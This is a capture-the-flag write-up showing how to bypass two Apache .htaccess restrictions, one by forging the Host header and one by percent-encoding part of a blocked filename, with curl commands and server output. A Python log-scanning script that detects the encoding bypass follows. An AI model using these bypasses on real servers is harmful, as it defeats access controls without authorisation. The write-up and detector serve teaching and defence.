The site tells us that there are .htaccess files that configure the
permissions for /one/flag.txt and /two/flag.txt.  
The .htaccess file for /one/flag.txt looks like this:  
```  
RewriteEngine On  
RewriteCond %{HTTP_HOST} !^localhost$  
RewriteRule ".*" "-" [F]  
```  
This tells us that if the Host header is anything other than exactly 'localhost', the
rule matches every path and the request is answered with 403 Forbidden. The Host
header is supplied by the client, though, so we can simply set it to 'localhost':

```bash  
$ curl -i -s -k -X $'GET' -H $'Host: localhost' $'http://34.87.217.252:30026/one/flag.txt'  
HTTP/1.1 200 OK  
Date: Sat, 24 Sep 2022 04:20:69 GMT  
Server: Apache/2.4.54 (Unix)  
Last-Modified: Tue, 20 Sep 2022 12:48:21 GMT  
ETag: "f-5e91b3e3b0f40"  
Accept-Ranges: bytes  
Content-Length: 15  
Content-Type: text/plain

DUCTF{thats_it_  
```  
First part of the flag down. Let's examine the second .htaccess file:  
```  
RewriteEngine On  
RewriteCond %{THE_REQUEST} flag  
RewriteRule ".*" "-" [F]  
```  
This has a similar structure but tests a different server variable: 'THE_REQUEST'.  
The official Apache documentation
(https://httpd.apache.org/docs/current/mod/mod_rewrite.html) states:  
```  
THE_REQUEST  
The full HTTP request line sent by the browser to the server (e.g., "GET
/index.html HTTP/1.1"). This does not include any additional headers sent by
the browser. This value has not been unescaped (decoded), unlike most other
variables below.  
```  
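This means we are not allowed to send a request line that contains the string
'flag'. Because THE_REQUEST is matched before decoding, while the path is
URL-decoded before it is mapped to a file, we simply replace part of 'flag' in
the URL with its URL-encoded form (%66 is 'f'):  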
```  
$ curl http://34.87.217.252:30026/two/%66lag.txt  
next_time_im_using_nginx}  
```  
Now we only have to combine the two parts of the flag to receive our points.
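
From the defender's side, the second bypass leaves a trace: the access log records the raw request line, so a request that slips past a raw-string filter but decodes to the blocked name can be found afterwards. The script below is an added example, not part of the original challenge or write-up; the log lines are constructed, and the function names and the combined-log layout are assumptions.

```python
import re
from urllib.parse import unquote

# Request field of an Apache access log line: the raw, undecoded request line
# (the same string mod_rewrite exposes as THE_REQUEST).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)"')
ESCAPE_RE = re.compile(r"%([0-9A-Fa-f]{2})")
# RFC 3986 unreserved characters never need percent-encoding.
UNRESERVED = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-._~")


def encoded_unreserved(target):
    """Return the unreserved characters that were percent-encoded in the raw target."""
    decoded = (chr(int(h, 16)) for h in ESCAPE_RE.findall(target))
    return [c for c in decoded if c in UNRESERVED]


def find_evasions(log_lines, blocked="flag"):
    """Report requests whose raw line passes the substring filter but whose decoded path does not."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        raw = m.group(0).strip('"')
        # Decode once, as the server does before mapping the path to a file.
        path = unquote(m.group("target").split("?", 1)[0])
        if blocked not in raw and blocked in path:
            hits.append({"raw": raw, "decoded_path": path,
                         "needless_escapes": encoded_unreserved(m.group("target"))})
    return hits


# Constructed sample log lines (documentation addresses, not taken from the page).
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Sep/2022:04:20:01 +0000] "GET /two/flag.txt HTTP/1.1" 403 199',
    '192.0.2.10 - - [24/Sep/2022:04:20:09 +0000] "GET /two/%66lag.txt HTTP/1.1" 200 25',
    '192.0.2.11 - - [24/Sep/2022:04:21:30 +0000] "GET /docs/a%20b.txt HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for hit in find_evasions(SAMPLE_LOG):
        print(hit)
```

Only the second sample line is reported; the `%20` in the third line is an ordinary escape and is ignored.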